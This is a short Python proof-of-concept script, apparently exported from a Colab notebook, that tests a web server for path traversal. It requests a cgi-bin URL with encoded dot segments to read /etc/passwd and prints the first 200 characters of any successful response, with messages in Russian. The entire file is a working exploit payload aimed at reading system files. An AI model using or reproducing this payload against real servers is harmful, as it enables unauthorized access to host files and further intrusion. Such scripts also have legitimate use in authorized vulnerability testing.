# -*- coding: utf-8 -*-
"""poc.ipynb

Automatically generated by Colab.

Original file is located at
    https://colab.research.google.com/drive/1qsoddIbr-StChF6zm7qe1n_sLr8kMBxx
"""

import requests

url = "http://example.com/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"

response = requests.get(url)

if response.status_code == 200:
    print("[+] Потенциальная уязвимость обнаружена. Ответ сервера:")
    print(response.text[:200])
else:
    print("[-] Уязвимость не подтверждена. Код ответа:", response.status_code)
